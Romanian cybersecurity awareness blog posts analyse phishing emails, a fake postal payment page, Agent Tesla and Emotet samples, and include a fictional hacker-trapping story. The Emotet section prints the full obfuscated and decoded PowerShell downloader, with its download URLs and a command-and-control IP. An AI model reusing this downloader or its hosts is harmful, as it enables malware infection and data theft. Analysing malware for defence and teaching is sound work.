Articole

România, fiind în plină dezvoltare tehnologică, se confruntă zilnic cu astfel de situații, unele controlabile, altele greu accesibile prin intermediul administratorilor de hosting, rețea, ISP etc.

Așa cum am menționat și în alte articole, o serie de dispozitive conectate la internet sunt exploatate de hackeri, făcând parte din sistemele lor de răspândire și control al virușilor.

Articolul de astăzi îl vom trece la categoria ”notă explicativă”, pentru ca fiecare să poată vizualiza complexitatea răspândirii unui astfel de virus!

Un simplu document Word ”dezlânțuie” o serie de activități ascunse în interiorul calculatorului, printre care și descărcarea de alte fișiere, în mod neautorizat. Acestea sunt activate și la rândul lor se conectează la o serie de IP-uri/Domenii pentru a stabili o legătură, destul de compleză, cu panoul de comandă al hackerului. Odată stabilită legătura, hackerul poate trimite diverse comenzi calculatorului… de la sustragerea de date, până la comenzi de atac asupra altor sisteme informatice.
Și toate acestea… în decursul a câtorva minute!

Ceea ce este prezentat în imaginea de mai sus, se poate raporta la 2 feluri de victime.

1. O victimă umană, un utilizator ce primește un email infectat.
Dacă are un minim de cunoștințe, totul se v-a termina acolo. Ignoră email-ul.. s-au îl raportează specialistului, în cazul în care pare ceva important… dar suspect!
Dacă descarcă atașamentul și îl deschide… cursul activităților se vede mai sus!

2. Un sistem compromis.
Poate fi: server, router, cameră supraveghere, frigider smart, condolă gaming, TV, pc, telefon, tabletă, sisteme de comunicare interioare, bec smart, încuietoare smart… etc etc
Mai pe scurt, poate fi orice dispozitiv ce este conectat la internet!

Rezolvarea acestor probleme este la fel de complexă și depinde de mulți factori, dar…. un minim de educație în domeniu, un sfat de la un specialist și o minte deschisă…. pot diminua impactul negativ asupra internauților și al sistemelor informatice!

În principiu am vrut să postez doar pozele, dar chiar îmi doresc să înțeleagă toată lumea, de aceea am adaugat și 2-3 fraze!

Așa că… ATENȚIE LA DETALII!!!

Parolele reuniunilor tale de pe Zoom au fost vulnerabile în plină pandemie.
– Şedinţele pe Zoom din timpul izolării nu au fost sigure sută la sută.
– O vulnerabilitate a permis hackerilor să ghicească parola întâlnirilor de la care se cunoştea ID-ul.
– Specialistul în cybersecurity Alexandru Angheluş îţi explică cât de slabe au fost parolele întâlnirilor pe care le-ai avut.

Securitatea aplicaţiei Zoom a fost slabă tocmai în perioada de vârf a pandemiei, când toţi managerii au apelat la conferinţele online ca să-şi conducă afacerile.
De la 10 milioane de utilizatori pe zi, Zoom a ajuns în aprilie la 200 de miloane.
Tom Anthony, un programator britanic, a fost stârnit de o neglijenţă a premierului Boris Johnson. Acesta a postat în 31 martie, pe Twitter, o captură cu ecranul său din timpul unei reuniuni a cabinetului prin Zoom.
Anthony a putut să vadă ID-ul conferinţei şi de acolo a …
Continuarea pe MediaFax.ro

– Ultima ameninţare cibernetică se poate instala chiar în încărcătorul mobilului, prin intermediul unui malware.
– Cu ajutorul BadPower, un atacator poate modifica software-ul din încărcătoarele fast charge şi prin urmare şi tensiunea electrică.
– Recomandarea principală este să îţi păzeşti şi încărcătorul, nu doar mobilul, dar programul poate fi instalat şi de la distanţă, prin atacarea telefonului.
– Cel puţin 18 modele sunt vulnerabile la BadPower

Dacă aveai impresia că banalul obiect cu care îţi încarci bateria telefonului este inofensiv, iată că a apărut şi aici o vulnerabilitate de care trebuie să te fereşti. Încărcătoarele noi, de tip „fast charging”, care oferă o încărcare …..
Specialistul în securitate cibernetică, Alexandru Angheluş, îţi recomandă să te fereşti de staţiile publice de încărcare şi să ai grijă atunci când împrumuţi încărcătorul.
Continuarea pe Mediafax.ro

Pentru astăzi, avem un domain ce pare suspect: posta-romana-ro.info
Suspiciunea orcărui utilizator trebuie sa intervină atunci când adresa este asemănătoare cu ceva, în cazul de față Poșta Romana.
În cazul în care avem de făcut plăți… ar trebui să fim puțin mai atenți!

Ok. Am primit un email în care se specifică faptul că trebuie să plătim ceva către Poșta Română!

Hai să analizăm împreună email-ul primit!
1. Aștepți vreun colet? Dacă DA, mergi mai departe, dacă NU… nu are sens să apeși pe ceva..
2. dragă client – Nu există! Un email către un client ce există în baza de date începe cu … ex. Dragă Alexandru / Domnule Angheluș etc.
3. taxe vamale(28.80 LEI). Urmează instrucțiunile: – Aș putea spunne că arată suspicios; suma între paranteze și un sec ”Urmează instr…”
4. Istorie – A cui istorie?
5. PASUL 1 : PLATA CHELTUIE… ”NOULU ATENȚIV” – Ok! Pentru un email generat automat… arată chiar tragic!
6. PASUL 2 …. Nu există!
7. IMPORTATE: 1,60 € – a) Nu înțeleg ce este ”importat”, b) Plata era în LEI, ce treabă are euro în poveste?
8. Click aici – Dacă era ”Apasă aici” poate prindea mai bine!
9. Dacă scrisoarea recomandată – Care scrisoare?!? Până acum am discutat despre un pachet, 28.80 LEI și 1,60 €…. hmmm
10. țineți suma de 1,60 EUR pe casă în ziua conformitații – € s-a transformat în EUR, ”pe casă” este greu de ținut EUR, de ziua Indepentenței am auzit… dar de cea a Conformității încă nu!
11. Puteți atașa informații ….pentru a o pastra în cel mai apropiat birou – Care scrisoare? … De ce în cel mai apropiat birou și nu în altă parte?

OK… pare suspect!
Dar hai să ”Click aici”!

Să începem analizarea paginii la care ne-a direcționat link-ul din spatele ”Click aici”.
1. Adresa este posta-romana-ro.info – De ce .info și nu .ro?!? Pentru a fi siguri, hai să căutăm pe Google!

OK. Se pare că adresa oficiala este posta-romana.ro, deci acel .info este dovada că se încearcă o inducere în eroare!

2. ”/……./……/servicii-expeditori/carti-ziare-reviste/in-romania/imprimate-interne/b5136/”
Acestea sunt foldere ce duc la un sistem de plată? NU PREA!

3. Avem steagul Americii, ok! Am mai găsit cazuri în care pagini oficiale din Romania erau gazduite pe servere din afara tării, dar unul ca Poșta Româna să fie încă acolo… mai greu!

După cum se vede, pagina este găzduită pe server de America.
Dar am cautat și pe Whois informații despre domain: Creat la data de 03.08.2020!
Interesant! Deci ”Poșta Română” foloseste un domain proaspăt creat ….

4. În partea de jos apare adresa reala, deoarece a copiat codul sursă a paginii oficiale!

Facem o ”plată”?

La adăugarea cardului, se pare că are un script ce verifică valabilitatea combinației de cifre.
De asemenea se poate vedea că suma de 28.80 a devenit ”amount: 2880”!
Am apăsat ”Pay online” și în trafic ne apare ca datele noastre au fost POSTate prin intermediul fisierului cc.php.
…dar iată și un email care nu este al nostru..
..oare acolo au plecat datele noastre?
Se pare că ne cere și parola primită prin SMS pentru confirmarea plații.
Această parolă este trimisă de către bancă, pentru a confirma ca plata este făcută de deținătorul cardului.
Apariția confirmării pe aceiași pagină, denotă că nu se face vreo plată. La plăți reale, clientul este redirecționat către pagina băncii, confirmă tranzacția, după care este trimis la pagina inițială.
Indiferent de câte ori vei introduce un cod, pagina va arăta că mai ai 2 încercări!

Putem spune cu siguranță că este o pagină falsă, creată pentru a fura datele cardurilor de bancă!

În ceea ce privește adresa de email găsită, are legătură cu China… de aceea și greșelile în scriere!

Poate că la prima vedere pare mult, dar atunci când este vorba despre plăți sau date personale, nu strică să fim puțin mai atenți la aceste detalii!!!

Departamentul contabil al unui client a primit un email din partea “Bancii Transilvania”.

Impactul a fost zero.

Tentativa fiind imediat raportată/redirectionată catre noi, pentru analiză!

Și asta, datorită ședințelor de Securitate cibernetică și Protecția datelor, avute cu toate departamentele, in special cu cele ce dețin date personale sau activează in zona de contabilitate!

Pentru inducerea in eroare, titlul email-ului este destul de atractiv FW: Banca Transilvania

Denumirea documentului este Document_BT24PDF.iso, deci este clară intenția de a masca existența fisierul ISO prin introducerea de “PDF” in denumirea lui.

Documentele ISO, printre altele, conțin arhivarea a unuia sau a mai multor fișiere, în cazul nostru conține un singur fisier .exe

De obicei fișierele executabile sunt acționate in modul silence, dar totuși pentru victimă este adaugat si un alt fișier neutru pentru a îi oferi ceva.
Exemplu: La deschiderea arhivei apare un document PDF, iar în mod invizibil mai rulează un fișier, acel fișier fiind chiar virusul hackerului.

In cazul de față nu există nimic. Doar executabilul care nu oferă nimic victimei, dar iși face treaba in background.

După extragerea executabilului l-am scanat pe VirusTotal pentru a găsi primele informatii

https://www.virustotal.com/gui/file/134ad4f00831941ea066eb4ee2ebbce6873f53d3f0dbf0c608acc921c5697f46/detection

Realizăm că nu este un malware nou creat, deoarece detecția lui este destul de mare.

Lăsăm fisierul executabil să ruleze in calculatorul pentru analiză, încercând să monitorizăm intreaga activitate.

Observăm activitate zero pentru o perioadă de timp, ceea ce inseamnă ca are setat un “Sleep”, adica să întarzie pentru anumite secunde rularea in calculatorul victimei a virusului.

Nu a instalat nimic in calculator, dar a ramas activ executabilul.

In acest timp am pornit si analiza traficului creat intre calculator si orice altceva de pe internet, pentru a vedea dacă activitatea virusului implică si conectarea in exteriorul retelei.

In urma filtrării traficului generat s-a observant că există schimb de date cu un IP extern.
Domain-ul nu este important să îl adăugăm în postare…

Din trafic am extras datele de logare ale virusului la un FTP cu domain de Romania, dar si faptul ca acestea nu mai sunt valabile, raspunsul FTP-ului fiind TCP Out-of-Order

Se pare ca domain-ul de Romania a fost compromis si FTP-ul a fost folosit în setarile virusului.

Am căutat informații despre incident sau malware și am descoperit că a fost facuta o postare pe Twitter despre domain-ul in cauză, împreuna cu afirmatia ca ar fi virusul Agent Tesla.

Același lucru îl găsim si in detaliile de pe VirusTotal.

Am vazut și scanarea pe platforma online a virusului si corelează cu ceea ce am gasit până acum.
Agent Tesla face parte din categoria Password Stealer. Mai exact, extrage toate datele de logare din calculatorul victimei și le trimite către hacker.

Având in vedere că nu există raspuns din partea FTP-ului la logarea virusului, inseamna că nu mai are acces. Fie nu mai există contul de FTP, fie datele de logare au fost schimbate.. etc

Chiar dacă fură ceva din calculatorul viitoarelor victime, nu are unde sa le trimită și astfel victimele doar vor ramane cu un virus inofensiv in calculator, pana va fi descoperit de antivirus, deoarece detecția lui devine foarte mare.

În concluzie, puțină educație si atenția sporită… ne pot scoate din astfel de situații ce pot deveni foarte dăunătoare pentru noi, dar mai ales pentru angajatori, care vor simți pe deplin impactul unei breșe de securitate!

În ceea ce privește domain-ul românesc compromis, acum este ok. De aceea nici virusul nu mai are datele corecte pentru logarea la FTP.
Și așa cum am mai discutat, este un exemplu și pentru deținătorii de pagini web, deoarece pot deveni ”ajutoare! pentru hackeri…
Tehnologia avansează, practicile celor rău intenționați se dezvoltă… este timpul ca toți utilizatorii să acorde atenție și securității cibernetice!


Unii… măcar lucruri elementare, iar cei implicați in activități serioase online… calculați ce pierderi puteți avea DACĂ!!!

Atenție la detalii!!!

Eu sunt… să zicem H4ker!
Astăzi vom vorbi despre mine ca hacker activ pe internet, dar și despre ce am pățit de curând.
Fac mai multe prostii pe net, dar astăzi vă voi povesti despre faptul că de ceva timp trimit email-uri de tip phishing către instituții din Romania, Grecia și Bulgaria.
Motivul meu este clar. Vreau să obțin cât mai multe date personale de logare de la victimele mele!!

Nu mă poate prinde nimeni, pentru că folosesc VPN și IP-ul meu este ascuns!!!

Am găsit un browser stealer, adică o aplicație ce fură datele din browserele victimelor, gen Firefox, Chrome, Opera etc.
Nu am bani să il criptez, dar pică lumea chiar dacă Antivirusul anunță problema. Am un ftp furat tot de la victime și ma folosesc de el pentru colectarea datelor.
Metoda este simplă, cunoscută, dar merge foarte bine din cauza lipsei de educație cibernetică, mai ales la instituțiile publice unde sunt multe persoane… ce nu dau atenție la detalii..

Zilnic am câte 5-10 victime și sunt mulțumit de rezultate, așteptând să prind ceva bun!

Dar ideea este că nu am știut ce poate face un specialist in securitate cibernetică, sau cei care se ocupă in general de fișierele virusate!!

Eu am ascuns virusul intr-un fișier .iso pe care dacă il deschizi activează toată activitatea fără ca victima să înțeleagă ceva. Neștiind că cineva poate extrage acel virus și îl poate analiza.

După cum se vede și în imaginea de mai sus, analistul care s-a ocupat de virusul meu a reușit să gasească datele mele de logare către locația unde vin cele furate de la victime.
Nu știam că se poate așa ceva. Acolo se vede și virusul meu, în varianta finală care ajungea în calculatoarele victimelor.
Așadar analistul putea avea acces la datele furate de mine și cine știe la ce altceva, dar asta este partea ok.

La un moment dat am văzut că imi dispar furăciunile, dar apar niște fișiere noi…

Im waiting este pus de mine, așa la smecherie… că aștept victimele să îmi trimită datele lor!
Dar a venit și fișierul cu .iso, credeam că este o eroare a fișierului trimis de mine, deși nu avea cum să vină pe server, dar până la urmă l-am deschis ca să rezolv eroarea virusului.
Până la urmă mi-am dat seama că nu mergea deschis și l-am șters! Prostie de eroare…
La vreo 2 minute victime noi, deschid să văd ce am furat și… ce naiba?!? Datele mele pe unul din fișiere?!?
Atunci am înțeles că fișierul .iso era chiar virusul meu, pe care l-am deschis și mi-am furat datele.
Întârzierea de cîteva minute este logică, deoarece virusul meu actionează dupa 2 minute de la deschidere ;)


Atunci m-a lovit o idee destul de dureroasă! Cum de a venit virusul pe server și dacă analistul este și el pe server și mi-a luat datele???
Asta chiar ar fi de rău!!!

La ceva timp și dupa alte câteva victime, apar victime noi si incă un fișier .iso, clar că nu pun botul de două ori la aceiași capcană!!! Hellooo

Alea cu PW le știu.. client mai vechi.
Management_CERT sună interesant, dar tot ce era acolo cred că erau date false, că nu mergea nimic deși păreau conturi de servere(am înțeles mai târziu că era pus să mă țină logat pe ftp).
Cloud_user_admin…. ăsta e genul de victime asteptate. Cont de Root/Admin pe el, dacă merge m-am scos!

Foatre tare, nu?
Ei bine am intrat pe link și mă ducea pe o pagină neterminată… deci nimic interesant…
Totuși intru pe whiteclouddrive. com să văd ce este și … NUUUUUUUUUU!!!!!!!!
Domeniu folosit de analiști ca și capcană pentru acesări neautorizate…. adica… pfff
Tocmai am realizat că analistul are datele mele!!! Luate de 2 ori… cred că a doua capcană a fost pentru confirmare…
Oare… ?? Pffff
Ce se aude afară? E cineva la usă? …………

Articolul este doar o poveste și trebuie tratată corespunzător!
Cei ce se pricep la astfel de activități pot renunța la varianta ”CTRL I” ! :)

Atenție la detalii!!!

Astăzi vom discuta despre un subiect ce devine tot mai intens: Dece să platesc pentru servicii de securitate cibernetică?

Ei bine, clienții sau potențialii clienți ai serviciilor de securitate cibernetică sunt de mai multe feluri: pricepuți, înțelegători, curioși, indiferenți, fără buget, cu buget, pricepuți, foste victime, prieteni ai unor victime etc.
Impactul unei breșe de securitate asupra acestora se diferențiază prin deciziile anterioare atacului: S-a facut ceva, orice… sau Nu s-a facut nimic!

Așa cum scrie si în titlul acestui articol, astazi vă vom prezenta câteva imagini despre servere/domenii din Romania, care sunt folosite pentru activități ilegale, prin intermediul cărora încercăm să atragem atenția asupra necesității implementării unor standarde de securitate cibernetică.


În principiu, majoritatea sunt folosite pentru gazduirea de pagini false (Paypal, DHL, LinkedIn, EMS, Banci, Emails, Eshops… etc), pentru gazduirea de fișiere virusate( acestea le vom prezenta într-un articol viitor), redirecționări către alte pagini … etc
Problema este că majoritatea deținătorilor de pagini web nu știu ce se petrece în spatele cortinei și de aceea este nevoie ca fiecare să conștientizeze impactul negativ asupra celorlalti utilizatori de internet, sau chiar rasupra lor!

Se poate observa că unele dintre paginile false au ca țintă utilizatori din China, ceea ce clarifică naționalitatea hackerilor, sau cel putin naționalitatea potențialelor victime.

Lista putea fi mai lungă, dar multe dintre domeniile gasite sunt deja remediate sau sunt în curs de remediere.

Trebuie să ne implicăm și să fim responsabili!

Pentru a încheia cu un răspuns la întrebarea de la începutul articolului trebuie ca toți să conștientizăm pericolul din spatele unui server/ domaniu compromis și faptul că involuntar am ajutat la furtul de date, furt de bani, furt de identitate etc.

Articolul conține informații publice!
Sursa: urlscan.io

Hai să începem cu informațiile de bază!

Emotet este un virus din categoria Trojan sau mai degrabă un downloader, care are nevoie de acceptul victimei pentru a își începe activitatea în noua gazdă.
Este cheia care deschide ușa pentru adevăratul virus, care are ca scop extragerea de date personale, pentru ca hackerul să poată utiliza contul sau cardul victimei în scopuri personale.

Dacă la începuturi era trimis prin email ca executabil, sau atasat(backdoor) anumitor programe „gratuite”, acum trimiterea lui se face prin intermediul unor documente care sunt trimise prin email, îar aceste documente conțin o comandă de descărcare și o adresă web, iar virusul este descărcat de acolo și actionează în noua gazda(pc, mobilr etc).
Aceasta metodă este folosită pentru a păcăli atât protecția serviciilor de email, cât și viitoarea victimă.

La intrarea virusului cu acceptul victimei, șansele de scapare se bazează doar în posibilitatea de recunoaștere a virusului respectiv de catre antivirus, firewall… în funcție de ce are victima în dispozitiv.

Dar sa trecem la povestea noastră și o sa facem o mică analiză malware.
Zilnic apar liste cu Ip-uri, domenii, dispozitive compromise. Una dintre aceste liste conține două domenii de România.
Se presupune că sunt controlate de hackeri și folosite pentru a își gazdui fisierele lor malware.

Accesam adresele si vedem ca ambele contin fisiere .doc.
De precizat ca pana aici Antivirusul nu reactioneaza.

Dupa cum se poate observa, fisierele sunt descarcate de pe aceste domenii de Romania (.ro) si apar ca fiind documente Microsoft Word 97-2003.

La scanare, virusul apare detectat de numai 18 si cei 60 de vendori prezenti pe platforma. Drept urmare, o mare parte si solutiile antivirus NU vor reactiona la aparitia virusului in dispozitiv.
In aceata varianta, doar aplicatiile celor de mai sus pot identifica virusul.
Iata si motivul detectiei slabe, virusul a fost creat… astazi. Ceea ce denota ca hackerul vine cu variante „curate” pentru a evita detectia.
http://trangvang.info.vn/home/pxxx7l/
https://74.101.225.121/tGQWzXxxxhSt
http://trangvang.info.vn/home/pxxx7l/
https://74.101.225.121/tBUxxxQWaf5EyJ8

Acum, pentru a avea o idee despre ce se intampla…
Comanda documentului arata cam asa: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE” /n „C:\Users\admin\AppData\Local\Temp\2050519442433378869714090.doc

Comanda folosita de Powershell este ascunsa si criptata:

Powershell -w hidden -en JABNAGEAdABlAGQAdgB0AG4AZAA9ACcASABpAGoAcgBsAGsAbABjAG4AYgAnADsAJABYAGcAbQB4AGkAagBsAHEAaQBjAGsAbABpACAAPQAgACcAMQAzADkAJwA7ACQATABhAHkAcABvAHQAdwBrAG4APQAnAFMAcwBrAGYAYwBkAHMAaQBrAHcAYwBjACcAOwAkAFkAcQBlAGkAcwBoAHIAZgB0AG0AcAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAWABnAG0AeABpAGoAbABxAGkAYwBrAGwAaQArACcALgBlAHgAZQAnADsAJABSAGEAegBnAGcAZQBpAHAAcABzAGMAPQAnAFkAawBxAGIAdAB4AHAAegAnADsAJABTAG4AeQBsAGUAdAB6AGsAZgBqAGYAbgA9ACYAKAAnAG4AZQAnACsAJwB3AC0AbwAnACsAJwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAFQALgB3AEUAQgBDAEwAaQBFAG4AVAA7ACQARwBhAHAAawBzAGUAaQB2AGUAbwA9ACcAaAB0AHQAcAA6AC8ALwB0AHIAYQBuAGcAdgBhAG4AZwAuAGkAbgBmAG8ALgB2AG4ALwBoAG8AbQBlAC8AcABvAEkAYwA3AGwALwAqAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAGYAbAB5AGIAdQB5AHMALgBuAGUAdAAvAGwAaQBiAHIAYQByAGkAZQBzAC8AeABlAHMALwAqAGgAdAB0AHAAOgAvAC8AaQBuAGYAbwByAG0AYQB0AGkAYwAtAGMAbAB1AGIALgBjAG8AbQAvAGwAYQBuAGcAdQBhAGcAZQAvAHkALwAqAGgAdAB0AHAAOgAvAC8AZABlAG0AbwAuAHMAdABpAGMAawB5AHAAbwBzAHQALgBpAG8ALwB3AHAALQBhAGQAbQBpAG4ALwBnAC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBkAHIAaQB2AGUAcgB0AHIAYQBpAG4AZQByAHMAYwBoAG8AbwBsAC4AYwBvAG0ALgBhAHUALwBsAG8AZwBzAC8AUgBZAEoAUABnAHIASwBPAEoALwAnAC4AIgBzAGAAcABsAEkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEcAegBqAGkAdQBhAGgAagB5AHIAeQB4AHQAPQAnAEgAZwBrAGMAZABzAGQAZgAnADsAZgBvAHIAZQBhAGMAaAAoACQASwB4AHoAdABhAGwAaABwAGkAbgB2ACAAaQBuACAAJABHAGEAcABrAHMAZQBpAHYAZQBvACkAewB0AHIAeQB7ACQAUwBuAHkAbABlAHQAegBrAGYAagBmAG4ALgAiAGQAYABvAHcATgBMAGAATwBhAEQARgBgAGkAbABFACIAKAAkAEsAeAB6AHQAYQBsAGgAcABpAG4AdgAsACAAJABZAHEAZQBpAHMAaAByAGYAdABtAHAAKQA7ACQAWQB0AHYAagBlAHIAcwB5AGEAdABoAHcAPQAnAE8AaABqAGQAZwBmAGIAcgB0AHgAbAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAFkAcQBlAGkAcwBoAHIAZgB0AG0AcAApAC4AIgBsAGAAZQBuAGcAdABIACIAIAAtAGcAZQAgADMAMgA2ADgAMQApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBzAGAAVABhAFIAVAAiACgAJABZAHEAZQBpAHMAaAByAGYAdABtAHAAKQA7ACQATwBoAGQAdQBqAHAAdwBoAG0AegB0AGEAZwA9ACcARAB3AGwAawB3AG4AdwBqAHoAeQB1AHMAJwA7AGIAcgBlAGEAawA7ACQAWAB4AG8AbAB2AGsAdABxAD0AJwBIAHEAaAB1AGoAagBnAHoAZAB6ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEEAZgBpAGkAcwB4AGQAdgA9ACcAUQBnAHAAYwBmAG8AbABvAHkAbgBrAHoAZAAnAA==

Decryptata din Base64

$�M�a�t�e�d�v�t�n�d�=�’�H�i�j�r�l�k�l�c�n�b�’�;�$�X�g�m�x�i�j�l�q�i�c�k�l�i� �=� �’�1�3�9�’�;�$�L�a�y�p�o�t�w�k�n�=�’�S�s�k�f�c�d�s�i�k�w�c�c�’�;�$�Y�q�e�i�s�h�r�f�t�m�p�=�$�e�n�v�:�u�s�e�r�p�r�o�f�i�l�e�+�’�\�’�+�$�X�g�m�x�i�j�l�q�i�c�k�l�i�+�’�.�e�x�e�’�;�$�R�a�z�g�g�e�i�p�p�s�c�=�’�Y�k�q�b�t�x�p�z�’�;�$�S�n�y�l�e�t�z�k�f�j�f�n�=�&�(�’�n�e�’�+�’�w�-�o�’�+�’�b�’�+�’�j�e�c�t�’�)� �n�e�T�.�w�E�B�C�L�i�E�n�T�;�$�G�a�p�k�s�e�i�v�e�o�=�’�h�t�t�p�:�/�/�t�r�a�n�g�v�a�n�g�.�i�n�f�o�.�v�n�/�h�o�m�e�/�p�o�I�c�7�l�/��h�t�t�p�s�:�/�/�w�w�w�.�f�l�y�b�u�y�s�.�n�e�t�/�l�i�b�r�a�r�i�e�s�/�x�e�s�/��h�t�t�p�:�/�/�i�n�f�o�r�m�a�t�i�c�-�c�l�u�b�.�c�o�m�/�l�a�n�g�u�a�g�e�/�y�/��h�t�t�p�:�/�/�d�e�m�o�.�s�t�i�c�k�y�p�o�s�t�.�i�o�/�w�p�-�a�d�m�i�n�/�g�/��h�t�t�p�s�:�/�/�w�w�w�.�d�r�i�v�e�r�t�r�a�i�n�e�r�s�c�h�o�o�l�.�c�o�m�.�a�u�/�l�o�g�s�/�R�Y�J�P�g�r�K�O�J�/�’�.�”�s��p�l�I�T�"�(�[�c�h�a�r�]�4�2�)�;�$�G�z�j�i�u�a�h�j�y�r�y�x�t�=�'�H�g�k�c�d�s�d�f�'�;�f�o�r�e�a�c�h�(�$�K�x�z�t�a�l�h�p�i�n�v� �i�n� �$�G�a�p�k�s�e�i�v�e�o�)�{�t�r�y�{�$�S�n�y�l�e�t�z�k�f�j�f�n�.�"�d��o�w�N�L��O�a�D�F��i�l�E�”�(�$�K�x�z�t�a�l�h�p�i�n�v�,� �$�Y�q�e�i�s�h�r�f�t�m�p�)�;�$�Y�t�v�j�e�r�s�y�a�t�h�w�=�’�O�h�j�d�g�f�b�r�t�x�l�’�;�I�f� �(�(�.�(�’�G�e�t�-�’�+�’�I�t�e�m�’�)� �$�Y�q�e�i�s�h�r�f�t�m�p�)�.�”�l��e�n�g�t�H�"� �-�g�e� �3�2�6�8�1�)� �{�[�D�i�a�g�n�o�s�t�i�c�s�.�P�r�o�c�e�s�s�]�:�:�"�s��T�a�R�T�”�(�$�Y�q�e�i�s�h�r�f�t�m�p�)�;�$�O�h�d�u�j�p�w�h�m�z�t�a�g�=�’�D�w�l�k�w�n�w�j�z�y�u�s�’�;�b�r�e�a�k�;�$�X�x�o�l�v�k�t�q�=�’�H�q�h�u�j�j�g�z�d�z�’�}�}�c�a�t�c�h�{�}�}�$�A�f�i�i�s�x�d�v�=�’�Q�g�p�c�f�o�l�o�y�n�k�z�d�’�

Decryptata are mai multe informatii interesante:

$Matedvtnd=’Hijrlklcnb’;$Xgmxijlqickli = ‘139’;$Laypotwkn=’Sskfcdsikwcc’;$Yqeishrftmp=$env:userprofile+’\’+$Xgmxijlqickli+’.exe’;$Razggeippsc=’Ykqbtxpz’;$Snyletzkfjfn=&(‘ne’+’w-o’+’b’+’ject’) neT.wEBCLiEnT;$Gapkseiveo=’http://trangvang.info.vn/home/poIc7l/https://www.flybuys.net/libraries/xes/http://informatic-club.com/language/y/http://demo.stickypost.io/wp-admin/g/https://www.drivertrainerschool.com.au/logs/RYJPgrKOJ/‘.”splIT"([char]42);$Gzjiuahjyryxt='Hgkcdsdf';foreach($Kxztalhpinv in $Gapkseiveo){try{$Snyletzkfjfn."dowNLOaDFilE”($Kxztalhpinv, $Yqeishrftmp);$Ytvjersyathw=’Ohjdgfbrtxl’;If ((.(‘Get-‘+’Item’) $Yqeishrftmp).”lengtH" -ge 32681) {[Diagnostics.Process]::"sTaRT”($Yqeishrftmp);$Ohdujpwhmztag=’Dwlkwnwjzyus’;break;$Xxolvktq=’Hqhujjgzdz’}}catch{}}$Afiisxdv=’Qgpcfoloynkzd’

Se pot observa domeniile accesate pentru a descarca virusul, dar si comenzile de Download, GET, Item, Start…

Se pare ca intradevar acel document nu este doar ceva de citit, ci contine comenzi de descarcare a unui fisier care stim ce este, dar poate fi orice altceva.
Mai in detaliu: $Xgmxijlqickli = ‘139’ +$Xgmxijlqickli+’.exe … deci avem un 139.exe, nu?

Avem polc7l care este descris ca fiind ATLUtils Module – adica Active Template Library si mai exact este chiar fisierul nostru 139.exe.
14 din 73… destul de rau pentru posibilele victime!

Acest fisier odata executat, instaleza un alt .exe in dispozitivul victimei(da, deja victima).

Acesta se conecteaza la Ip-ul/host-ul de unde vin toate comenzile hackerului.
Virusul in sine preia comenzi date de hacker si le executa la nivel de dispozitiv.
Exemple: se poate raspandi in retea, colecteaza date, trimite date, ataca, stocheaza date, spioneaza tastatura/camera/monitor etc.

In cazul nostru dispozitivul se conecteaza la adresa http://68.114.229.171/, iar acolo se gaseste acel C&C Panel, adica Panoul de Comanda si Control al atacatorului.

Cam asta ar fi pentru astazi.
In concluzie, daca ai o pagina web sau un server si nu sunt protejate, poti deveni parte activa la activitatile ilegale ale hackerilor.
Deocamdata acest lucru nu este pedepsit, dar… in timp lucrurile se pot schimba!

In ceea ce priveste adevarata victima, grija la ce documente accesati, indiferent de la cine credeti ca provin.